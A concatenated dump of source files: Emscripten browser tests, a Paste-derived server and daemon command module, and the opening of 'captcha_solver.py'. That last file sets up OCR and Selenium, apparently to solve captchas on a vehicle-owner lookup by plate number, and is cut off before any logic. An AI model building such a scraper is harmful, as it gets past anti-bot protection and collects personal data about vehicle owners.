self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME=1']]:
self.compile_btest([path_from_root('tests', 'small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_system(self):
self.btest(path_from_root('tests', 'system.c'), '0')
# Tests that it is possible to hook into/override a symbol defined in a system library.
@requires_graphics_hardware
def test_override_system_js_lib_symbol(self):
# This test verifies it is possible to override a symbol from WebGL library.
# When WebGL is implicitly linked in, the implicit linking should happen before any user --js-libraries, so that they can adjust
# the behavior afterwards.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
# When WebGL is explicitly linked to in strict mode, the linking order on command line should enable overriding.
self.btest(path_from_root('tests', 'test_override_system_js_lib_symbol.c'),
expected='5121',
args=['-s', 'AUTO_JS_LIBRARIES=0', '-lwebgl.js', '--js-library', path_from_root('tests', 'test_override_system_js_lib_symbol.js')])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_2GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that growth doesn't go beyond 2GB without the max being set for that,
# and that we can catch an allocation failure exception for that
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=2GB']
self.do_run_in_out_file_test('tests', 'browser', 'test_2GB_fail.cpp', js_engines=[config.V8_ENGINE])
@no_firefox('no 4GB support yet')
def test_zzz_zzz_4GB_fail(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we properly report an allocation error that would overflow over
# 4GB.
self.emcc_args += ['-O2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'MAXIMUM_MEMORY=4GB', '-s', 'ABORTING_MALLOC=0']
self.do_run_in_out_file_test('tests', 'browser', 'test_4GB_fail.cpp', js_engines=[config.V8_ENGINE])
@unittest.skip("only run this manually, to test for race conditions")
@parameterized({
'normal': ([],),
'assertions': (['-s', 'ASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
# the specific symptom of the hang that was fixed is that the test hangs
# at some point, using 0% CPU. often that occured in 0-200 iterations, but
# you may want to adjust "ITERATIONS".
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_hammer.cpp'),
expected='0',
args=['-s', 'USE_PTHREADS=1', '-O2', '-s', 'PROXY_TO_PTHREAD',
'-DITERATIONS=1024', '-g1'] + args,
timeout=10000,
# don't run this with the default extra_tries value, as this is
# *meant* to notice something random, a race condition.
extra_tries=0)
class emrun(RunnerCore):
def test_emrun_info(self):
if not has_browser():
self.skipTest('need a browser')
result = self.run_process([path_from_root('emrun'), '--system_info', '--browser_info'], stdout=PIPE).stdout
assert 'CPU' in result
assert 'Browser' in result
assert 'Traceback' not in result
result = self.run_process([path_from_root('emrun'), '--list_browsers'], stdout=PIPE).stdout
assert 'Traceback' not in result
def test_emrun(self):
self.run_process([EMCC, path_from_root('tests', 'test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
if not has_browser():
self.skipTest('need a browser')
# We cannot run emrun from the temp directory the suite will clean up afterwards, since the
# browser that is launched will have that directory as startup directory, and the browser will
# not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
# delete it. Therefore switch away from that directory before launching.
os.chdir(path_from_root())
args_base = [path_from_root('emrun'), '--timeout', '30', '--safe_firefox_profile',
'--kill_exit', '--port', '6939', '--verbose',
'--log_stdout', self.in_dir('stdout.txt'),
'--log_stderr', self.in_dir('stderr.txt')]
# Verify that trying to pass argument to the page without the `--` separator will
# generate an actionable error message
err = self.expect_fail(args_base + ['--foo'])
self.assertContained('error: unrecognized arguments: --foo', err)
self.assertContained('remember to add `--` between arguments', err)
if EMTEST_BROWSER is not None:
# If EMTEST_BROWSER carried command line arguments to pass to the browser,
# (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
# so strip them out.
browser_cmd = shlex.split(EMTEST_BROWSER)
browser_path = browser_cmd[0]
args_base += ['--browser', browser_path]
if len(browser_cmd) > 1:
browser_args = browser_cmd[1:]
if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
# emrun uses its own -profile, strip it out
parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
parser.add_argument('-profile')
parser.add_argument('--profile')
browser_args = parser.parse_known_args(browser_args)[1]
if browser_args:
args_base += ['--browser_args', ' ' + ' '.join(browser_args)]
for args in [
args_base,
args_base + ['--private_browsing', '--port', '6941']
]:
args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
print(shared.shlex_join(args))
proc = self.run_process(args, check=False)
self.assertEqual(proc.returncode, 100)
stdout = open(self.in_dir('stdout.txt'), 'r').read()
stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out uneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import print_function
import atexit
import errno
import logging
import optparse
import os
import re
import signal
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
def _set_message(self, value):
"""Setter for 'message'; needed only to override deprecation
in BaseException."""
self.__message = value
# BaseException.message has been deprecated since Python 2.6.
# To prevent DeprecationWarning from popping up over this
# pre-existing attribute, use a new property that takes lookup
# precedence.
message = property(_get_message, _set_message)
class NoDefault(object):
pass
# run and invoke methods moved below ServeCommand
class Command(object):
def __init__(self, name):
self.command_name = name
max_args = None
max_args_error = 'You must provide no more than %(max_args)s arguments'
min_args = None
min_args_error = 'You must provide at least %(min_args)s arguments'
required_args = None
# If this command takes a configuration file, set this to 1 or -1
# Then if invoked through #! the config file will be put into the positional
# arguments -- at the beginning with 1, at the end with -1
takes_config_file = None
# Grouped in help messages by this:
group_name = ''
required_args = ()
description = None
usage = ''
hidden = False
# This is the default verbosity level; --quiet subtracts,
# --verbose adds:
default_verbosity = 0
# This is the default interactive state:
default_interactive = 0
return_code = 0
BadCommand = BadCommand
# Must define:
# parser
# summary
# command()
def run(self, args):
self.parse_args(args)
# Setup defaults:
for name, default in [('verbose', 0),
('quiet', 0),
('interactive', False),
('overwrite', False)]:
if not hasattr(self.options, name):
setattr(self.options, name, default)
if getattr(self.options, 'simulate', False):
self.options.verbose = max(self.options.verbose, 1)
self.interactive = self.default_interactive
if getattr(self.options, 'interactive', False):
self.interactive += self.options.interactive
if getattr(self.options, 'no_interactive', False):
self.interactive = False
self.verbose = self.default_verbosity
self.verbose += self.options.verbose
self.verbose -= self.options.quiet
self.simulate = getattr(self.options, 'simulate', False)
# For #! situations:
if os.environ.get('PASTE_CONFIG_FILE') and self.takes_config_file is not None:
take = self.takes_config_file
filename = os.environ.get('PASTE_CONFIG_FILE')
if take == 1:
self.args.insert(0, filename)
elif take == -1:
self.args.append(filename)
else:
assert 0, (
"Value takes_config_file must be None, 1, or -1 (not %r)"
% take)
if os.environ.get('PASTE_DEFAULT_QUIET'):
self.verbose = 0
# Validate:
if self.min_args is not None and len(self.args) < self.min_args:
raise BadCommand(
self.min_args_error % {'min_args': self.min_args,
'actual_args': len(self.args)})
if self.max_args is not None and len(self.args) > self.max_args:
raise BadCommand(
self.max_args_error % {'max_args': self.max_args,
'actual_args': len(self.args)})
for var_name, option_name in self.required_args:
if not getattr(self.options, var_name, None):
raise BadCommand(
'You must provide the option %s' % option_name)
result = self.command()
if result is None:
return self.return_code
else:
return result
def parse_args(self, args):
if self.usage:
usage = ' ' + self.usage
else:
usage = ''
self.parser.usage = "%%prog [options]%s\n%s" % (
usage, self.summary)
self.parser.prog = self._prog_name()
if self.description:
desc = self.description
desc = textwrap.dedent(desc)
self.parser.description = desc
self.options, self.args = self.parser.parse_args(args)
def _prog_name(self):
return '%s %s' % (os.path.basename(sys.argv[0]), self.command_name)
########################################
# Utility methods
########################################
def pad(self, s, length, dir='left'):
if len(s) >= length:
return s
if dir == 'left':
return s + ' ' * (length - len(s))
else:
return ' ' * (length - len(s)) + s
def standard_parser(cls, verbose=True,
interactive=False,
no_interactive=False,
simulate=False,
quiet=False,
overwrite=False):
"""
Create a standard ``OptionParser`` instance.
Typically used like::
class MyCommand(Command):
parser = Command.standard_parser()
Subclasses may redefine ``standard_parser``, so use the
nearest superclass's class method.
"""
parser = BoolOptionParser()
if verbose:
parser.add_option('-v', '--verbose',
action='count',
dest='verbose',
default=0)
if quiet:
parser.add_option('-q', '--quiet',
action='count',
dest='quiet',
default=0)
if no_interactive:
parser.add_option('--no-interactive',
action="count",
dest="no_interactive",
default=0)
if interactive:
parser.add_option('-i', '--interactive',
action='count',
dest='interactive',
default=0)
if simulate:
parser.add_option('-n', '--simulate',
action='store_true',
dest='simulate',
default=False)
if overwrite:
parser.add_option('-f', '--overwrite',
dest="overwrite",
action="store_true",
help="Overwrite files (warnings will be emitted for non-matching files otherwise)")
return parser
standard_parser = classmethod(standard_parser)
def quote_first_command_arg(self, arg):
"""
There's a bug in Windows when running an executable that's
located inside a path with a space in it. This method handles
that case, or on non-Windows systems or an executable with no
spaces, it just leaves well enough alone.
"""
if sys.platform != 'win32' or ' ' not in arg:
# Problem does not apply:
return arg
try:
import win32api
except ImportError:
raise ValueError(
"The executable %r contains a space, and in order to "
"handle this issue you must have the win32api module "
"installed" % arg)
arg = win32api.GetShortPathName(arg)
return arg
def parse_vars(self, args):
"""
Given variables like ``['a=b', 'c=d']`` turns it into ``{'a':
'b', 'c': 'd'}``
"""
result = {}
for arg in args:
if '=' not in arg:
raise BadCommand(
'Variable assignment %r invalid (no "=")'
% arg)
name, value = arg.split('=', 1)
result[name] = value
return result
def logging_file_config(self, config_file):
"""
Setup logging via the logging module's fileConfig function with the
specified ``config_file``, if applicable.
ConfigParser defaults are specified for the special ``__file__``
and ``here`` variables, similar to PasteDeploy config loading.
"""
parser = configparser.ConfigParser()
parser.read([config_file])
if parser.has_section('loggers'):
config_file = os.path.abspath(config_file)
fileConfig(config_file, dict(__file__=config_file,
here=os.path.dirname(config_file)))
class NotFoundCommand(Command):
def run(self, args):
print('Command %r not known (you may need to run setup.py egg_info)'
% self.command_name)
commands = list()
commands.sort()
if not commands:
print('No commands registered.')
print('Have you installed Paste Script?')
print('(try running python setup.py develop)')
return 2
print('Known commands:')
longest = max([len(n) for n, c in commands])
for name, command in commands:
print(' %s %s' % (self.pad(name, length=longest),
command.load().summary))
return 2
# ---- From paste.script.serve ----------------------------------------
MAXFD = 1024
jython = sys.platform.startswith('java')
class DaemonizeException(Exception):
pass
class ServeCommand(Command):
min_args = 0
usage = 'CONFIG_FILE [start|stop|restart|status] [var=value]'
takes_config_file = 1
summary = "Serve the described application"
description = """\
This command serves a web application that uses a paste.deploy
configuration file for the server and application.
If start/stop/restart is given, then --daemon is implied, and it will
start (normal operation), stop (--stop-daemon), or do both.
You can also include variable assignments like 'http_port=8080'
and then use %(http_port)s in your config files.
"""
# used by subclasses that configure apps and servers differently
requires_config_file = True
parser = Command.standard_parser(quiet=True)
parser.add_option('-n', '--app-name',
dest='app_name',
metavar='NAME',
help="Load the named application (default main)")
parser.add_option('-s', '--server',
dest='server',
metavar='SERVER_TYPE',
help="Use the named server.")
parser.add_option('--server-name',
dest='server_name',
metavar='SECTION_NAME',
help="Use the named server as defined in the configuration file (default: main)")
if hasattr(os, 'fork'):
parser.add_option('--daemon',
dest="daemon",
action="store_true",
help="Run in daemon (background) mode")
parser.add_option('--pid-file',
dest='pid_file',
metavar='FILENAME',
help="Save PID to file (default to paster.pid if running in daemon mode)")
parser.add_option('--log-file',
dest='log_file',
metavar='LOG_FILE',
help="Save output to the given log file (redirects stdout)")
parser.add_option('--reload',
dest='reload',
action='store_true',
help="Use auto-restart file monitor")
parser.add_option('--reload-interval',
dest='reload_interval',
default=1,
help="Seconds between checking files (low number can cause significant CPU usage)")
parser.add_option('--monitor-restart',
dest='monitor_restart',
action='store_true',
help="Auto-restart server if it dies")
parser.add_option('--status',
action='store_true',
dest='show_status',
help="Show the status of the (presumably daemonized) server")
if hasattr(os, 'setuid'):
# I don't think these are available on Windows
parser.add_option('--user',
dest='set_user',
metavar="USERNAME",
help="Set the user (usually only possible when run as root)")
parser.add_option('--group',
dest='set_group',
metavar="GROUP",
help="Set the group (usually only possible when run as root)")
parser.add_option('--stop-daemon',
dest='stop_daemon',
action='store_true',
help='Stop a daemonized server (given a PID file, or default paster.pid file)')
if jython:
parser.add_option('--disable-jython-reloader',
action='store_true',
dest='disable_jython_reloader',
help="Disable the Jython reloader")
_scheme_re = re.compile(r'^[a-z][a-z]+:', re.I)
default_verbosity = 1
_reloader_environ_key = 'PYTHON_RELOADER_SHOULD_RUN'
_monitor_environ_key = 'PASTE_MONITOR_SHOULD_RUN'
possible_subcommands = ('start', 'stop', 'restart', 'status')
def command(self):
if self.options.stop_daemon:
return self.stop_daemon()
if not hasattr(self.options, 'set_user'):
# Windows case:
self.options.set_user = self.options.set_group = None
# @@: Is this the right stage to set the user at?
self.change_user_group(
self.options.set_user, self.options.set_group)
if self.requires_config_file:
if not self.args:
raise BadCommand('You must give a config file')
app_spec = self.args[0]
if len(self.args) > 1 and self.args[1] in self.possible_subcommands:
cmd = self.args[1]
restvars = self.args[2:]
else:
cmd = None
restvars = self.args[1:]
else:
app_spec = ""
if self.args and self.args[0] in self.possible_subcommands:
cmd = self.args[0]
restvars = self.args[1:]
else:
cmd = None
restvars = self.args[:]
if (getattr(self.options, 'daemon', False) and
getattr(self.options, 'reload', False)):
raise BadCommand('The --daemon and --reload options may not be used together')
jython_monitor = False
if self.options.reload:
if jython and not self.options.disable_jython_reloader:
# JythonMonitor raises the special SystemRestart
# exception that'll cause the Jython interpreter to
# reload in the existing Java process (avoiding
# subprocess startup time)
try:
from paste.reloader import JythonMonitor
except ImportError:
pass
else:
jython_monitor = JythonMonitor(poll_interval=int(
self.options.reload_interval))
if self.requires_config_file:
jython_monitor.watch_file(self.args[0])
if not jython_monitor:
if os.environ.get(self._reloader_environ_key):
from paste import reloader
if self.verbose > 1:
print('Running reloading file monitor')
reloader.install(int(self.options.reload_interval))
if self.requires_config_file:
reloader.watch_file(self.args[0])
else:
return self.restart_with_reloader()
if cmd not in (None, 'start', 'stop', 'restart', 'status'):
raise BadCommand(
'Error: must give start|stop|restart (not %s)' % cmd)
if cmd == 'status' or self.options.show_status:
return self.show_status()
if cmd == 'restart' or cmd == 'stop':
result = self.stop_daemon()
if result:
print("Could not stop daemon")
# It's ok to continue trying to restart if stop_daemon returns
# a 1, otherwise shortcut and return.
if cmd == 'restart' and result != 1:
return result
if cmd == 'stop':
return result
self.options.daemon = True
if cmd == 'start':
self.options.daemon = True
app_name = self.options.app_name
vars = self.parse_vars(restvars)
if not self._scheme_re.search(app_spec):
app_spec = 'config:' + app_spec
server_name = self.options.server_name
if self.options.server:
server_spec = 'egg:PasteScript'
assert server_name is None
server_name = self.options.server
else:
server_spec = app_spec
base = os.getcwd()
if getattr(self.options, 'daemon', False):
if not self.options.pid_file:
self.options.pid_file = 'paster.pid'
if not self.options.log_file:
self.options.log_file = 'paster.log'
# Ensure the log file is writeable
if self.options.log_file:
try:
writeable_log_file = open(self.options.log_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to log file: %s' % ioe
raise BadCommand(msg)
writeable_log_file.close()
# Ensure the pid file is writeable
if self.options.pid_file:
try:
writeable_pid_file = open(self.options.pid_file, 'a')
except IOError as ioe:
msg = 'Error: Unable to write to pid file: %s' % ioe
raise BadCommand(msg)
writeable_pid_file.close()
if getattr(self.options, 'daemon', False):
try:
self.daemonize()
except DaemonizeException as ex:
if self.verbose > 0:
print(str(ex))
return
if (self.options.monitor_restart and not
os.environ.get(self._monitor_environ_key)):
return self.restart_with_monitor()
if self.options.pid_file:
self.record_pid(self.options.pid_file)
if self.options.log_file:
stdout_log = LazyWriter(self.options.log_file, 'a')
sys.stdout = stdout_log
sys.stderr = stdout_log
logging.basicConfig(stream=stdout_log)
log_fn = app_spec
if log_fn.startswith('config:'):
log_fn = app_spec[len('config:'):]
elif log_fn.startswith('egg:'):
log_fn = None
if log_fn:
log_fn = os.path.join(base, log_fn)
self.logging_file_config(log_fn)
server = loadserver(server_spec, name=server_name, relative_to=base, global_conf=vars)
app = loadapp(app_spec, name=app_name, relative_to=base, global_conf=vars)
if self.verbose > 0:
if hasattr(os, 'getpid'):
msg = 'Starting server in PID %i.' % os.getpid()
else:
msg = 'Starting server.'
print(msg)
def serve():
try:
server(app)
except (SystemExit, KeyboardInterrupt) as e:
if self.verbose > 1:
raise
if str(e):
msg = ' ' + str(e)
else:
msg = ''
print('Exiting%s (-v to see traceback)' % msg)
except AttributeError as e:
# Capturing bad error response from paste
if str(e) == "'WSGIThreadPoolServer' object has no attribute 'thread_pool'":
import socket
raise socket.error(98, 'Address already in use')
else:
raise AttributeError(e)
if jython_monitor:
# JythonMonitor has to be ran from the main thread
threading.Thread(target=serve).start()
print('Starting Jython file monitor')
jython_monitor.periodic_reload()
else:
serve()
def daemonize(self):
pid = live_pidfile(self.options.pid_file)
if pid:
raise DaemonizeException(
"Daemon is already running (PID: %s from PID file %s)"
% (pid, self.options.pid_file))
if self.verbose > 0:
print('Entering daemon mode')
pid = os.fork()
if pid:
# The forked process also has a handle on resources, so we
# *don't* want proper termination of the process, we just
# want to exit quick (which os._exit() does)
os._exit(0)
# Make this the session leader
os.setsid()
# Fork again for good measure!
pid = os.fork()
if pid:
os._exit(0)
# @@: Should we set the umask and cwd now?
import resource # Resource usage information.
maxfd = resource.getrlimit(resource.RLIMIT_NOFILE)[1]
if maxfd == resource.RLIM_INFINITY:
maxfd = MAXFD
# Iterate through and close all file descriptors.
for fd in range(0, maxfd):
try:
os.close(fd)
except OSError: # ERROR, fd wasn't open to begin with (ignored)
pass
if hasattr(os, "devnull"):
REDIRECT_TO = os.devnull
else:
REDIRECT_TO = "/dev/null"
os.open(REDIRECT_TO, os.O_RDWR) # standard input (0)
# Duplicate standard input to standard output and standard error.
os.dup2(0, 1) # standard output (1)
os.dup2(0, 2) # standard error (2)
def record_pid(self, pid_file):
pid = os.getpid()
if self.verbose > 1:
print('Writing PID %s to %s' % (pid, pid_file))
f = open(pid_file, 'w')
f.write(str(pid))
f.close()
atexit.register(_remove_pid_file, pid, pid_file, self.verbose)
def stop_daemon(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file exists in %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print("Not a valid PID file in %s" % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print("PID in %s is not valid (deleting)" % pid_file)
try:
os.unlink(pid_file)
except (OSError, IOError) as e:
print("Could not delete: %s" % e)
return 2
return 1
for j in range(10):
if not live_pidfile(pid_file):
break
os.kill(pid, signal.SIGTERM)
time.sleep(1)
else:
print("failed to kill web process %s" % pid)
return 3
if os.path.exists(pid_file):
os.unlink(pid_file)
return 0
def show_status(self):
pid_file = self.options.pid_file or 'paster.pid'
if not os.path.exists(pid_file):
print('No PID file %s' % pid_file)
return 1
pid = read_pidfile(pid_file)
if not pid:
print('No PID in file %s' % pid_file)
return 1
pid = live_pidfile(pid_file)
if not pid:
print('PID %s in %s is not running' % (pid, pid_file))
return 1
print('Server running in PID %s' % pid)
return 0
def restart_with_reloader(self):
self.restart_with_monitor(reloader=True)
def restart_with_monitor(self, reloader=False):
if self.verbose > 0:
if reloader:
print('Starting subprocess with file monitor')
else:
print('Starting subprocess with monitor parent')
while 1:
args = [self.quote_first_command_arg(sys.executable)] + sys.argv
new_environ = os.environ.copy()
if reloader:
new_environ[self._reloader_environ_key] = 'true'
else:
new_environ[self._monitor_environ_key] = 'true'
proc = None
try:
try:
_turn_sigterm_into_systemexit()
proc = subprocess.Popen(args, env=new_environ)
exit_code = proc.wait()
proc = None
except KeyboardInterrupt:
print('^C caught in monitor process')
if self.verbose > 1:
raise
return 1
finally:
if proc is not None and hasattr(os, 'kill'):
try:
os.kill(proc.pid, signal.SIGTERM)
except (OSError, IOError):
pass
if reloader:
# Reloader always exits with code 3; but if we are
# a monitor, any exit code will restart
if exit_code != 3:
return exit_code
if self.verbose > 0:
print('-' * 20, 'Restarting', '-' * 20)
def change_user_group(self, user, group):
if not user and not group:
return
import pwd
import grp
uid = gid = None
if group:
try:
gid = int(group)
group = grp.getgrgid(gid).gr_name
except ValueError:
import grp
try:
entry = grp.getgrnam(group)
except KeyError:
raise BadCommand(
"Bad group: %r; no such group exists" % group)
gid = entry.gr_gid
try:
uid = int(user)
user = pwd.getpwuid(uid).pw_name
except ValueError:
try:
entry = pwd.getpwnam(user)
except KeyError:
raise BadCommand(
"Bad username: %r; no such user exists" % user)
if not gid:
gid = entry.pw_gid
uid = entry.pw_uid
if self.verbose > 0:
print('Changing user to %s:%s (%s:%s)' % (
user, group or '(unknown)', uid, gid))
if hasattr(os, 'initgroups'):
os.initgroups(user, gid)
else:
os.setgroups([e.gr_gid for e in grp.getgrall()
if user in e.gr_mem] + [gid])
if gid:
os.setgid(gid)
if uid:
os.setuid(uid)
class LazyWriter(object):
"""
File-like object that opens a file lazily when it is first written
to.
"""
def __init__(self, filename, mode='w'):
self.filename = filename
self.fileobj = None
self.lock = threading.Lock()
self.mode = mode
def open(self):
if self.fileobj is None:
self.lock.acquire()
try:
if self.fileobj is None:
self.fileobj = open(self.filename, self.mode)
finally:
self.lock.release()
return self.fileobj
def write(self, text):
fileobj = self.open()
fileobj.write(text)
fileobj.flush()
def writelines(self, text):
fileobj = self.open()
fileobj.writelines(text)
fileobj.flush()
def flush(self):
self.open().flush()
def live_pidfile(pidfile):
"""(pidfile:str) -> int | None
Returns an int found in the named file, if there is one,
and if there is a running process with that process id.
Return None if no such process exists.
"""
pid = read_pidfile(pidfile)
if pid:
try:
os.kill(int(pid), 0)
return pid
except OSError as e:
if e.errno == errno.EPERM:
return pid
return None
def read_pidfile(filename):
if os.path.exists(filename):
try:
f = open(filename)
content = f.read()
f.close()
return int(content.strip())
except (ValueError, IOError):
return None
else:
return None
def _remove_pid_file(written_pid, filename, verbosity):
current_pid = os.getpid()
if written_pid != current_pid:
# A forked process must be exiting, not the process that
# wrote the PID file
return
if not os.path.exists(filename):
return
f = open(filename)
content = f.read().strip()
f.close()
try:
pid_in_file = int(content)
except ValueError:
pass
else:
if pid_in_file != current_pid:
print("PID file %s contains %s, not expected PID %s" % (
filename, pid_in_file, current_pid))
return
if verbosity > 0:
print("Removing PID file %s" % filename)
try:
os.unlink(filename)
return
except OSError as e:
# Record, but don't give traceback
print("Cannot remove PID file: %s" % e)
# well, at least lets not leave the invalid PID around...
try:
f = open(filename, 'w')
f.write('')
f.close()
except OSError as e:
print('Stale PID left in file: %s (%e)' % (filename, e))
else:
print('Stale PID removed')
def ensure_port_cleanup(bound_addresses, maxtries=30, sleeptime=2):
"""
This makes sure any open ports are closed.
Does this by connecting to them until they give connection
refused. Servers should call like::
import paste.script
ensure_port_cleanup([80, 443])
"""
atexit.register(_cleanup_ports, bound_addresses, maxtries=maxtries,
sleeptime=sleeptime)
def _cleanup_ports(bound_addresses, maxtries=30, sleeptime=2):
# Wait for the server to bind to the port.
import socket
import errno
for bound_address in bound_addresses:
for attempt in range(maxtries):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect(bound_address)
except socket.error as e:
if e.args[0] != errno.ECONNREFUSED:
raise
break
else:
time.sleep(sleeptime)
else:
raise SystemExit('Timeout waiting for port.')
sock.close()
def _turn_sigterm_into_systemexit():
"""
Attempts to turn a SIGTERM exception into a SystemExit exception.
"""
def handle_term(signo, frame):
raise SystemExit
signal.signal(signal.SIGTERM, handle_term)
# ---- from paste.script.command --------------------------------------
python_version = sys.version.splitlines()[0].strip()
parser = optparse.OptionParser(add_help_option=False,
# version='%s from %s (python %s)'
# % (dist, dist.location, python_version),
usage='%prog [paster_options] COMMAND [command_options]')
parser.add_option(
'-h', '--help',
action='store_true',
dest='do_help',
help="Show this help message")
parser.disable_interspersed_args()
# @@: Add an option to run this in another Python interpreter
commands = {
'serve': ServeCommand
}
def run(args=None):
if (not args and len(sys.argv) >= 2 and os.environ.get('_') and
sys.argv[0] != os.environ['_'] and os.environ['_'] == sys.argv[1]):
# probably it's an exe execution
args = ['exe', os.environ['_']] + sys.argv[2:]
if args is None:
args = sys.argv[1:]
options, args = parser.parse_args(args)
options.base_parser = parser
if options.do_help:
args = ['help'] + args
if not args:
print('Usage: %s COMMAND' % sys.argv[0])
args = ['help']
command_name = args[0]
if command_name not in commands:
command = NotFoundCommand
else:
command = commands[command_name]
invoke(command, command_name, options, args[1:])
def invoke(command, command_name, options, args):
try:
runner = command(command_name)
exit_code = runner.run(args)
except BadCommand as e:
print(e.message)
exit_code = e.exit_code
sys.exit(exit_code)
|
captcha_solver.py
|
# -*- coding: utf-8 -*-
import os
import pytesseract
import time
import Queue
from BeautifulSoup import BeautifulSoup
import re
import threading
import pickle
import pyautogui
import cv2
from PIL import Image
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
from selenium.webdriver import ActionChains
import fetch_mod
login_active = False
userhome = os.path.expanduser('~')
username = os.path.split(userhome)[-1]
webdriverPath = 'C:\Python27\webdrivers\chromedriver.exe'
if username == "mani":
downloadPath = "C:\Users\mani\Documents\Downloads\JpegGenerate.jpg"
elif username == "user":
downloadPath = "C:\Users\user\Downloads\JpegGenerate.jpg"
dictMsgStr = {
"search": "Suchen Sie den Halter oder die Halterin durch die Eingabe der "
"Kontrollschildnummer im nachstehenden Feld.",
"wait": "Ihre Anfrage wird verarbeitet ....",
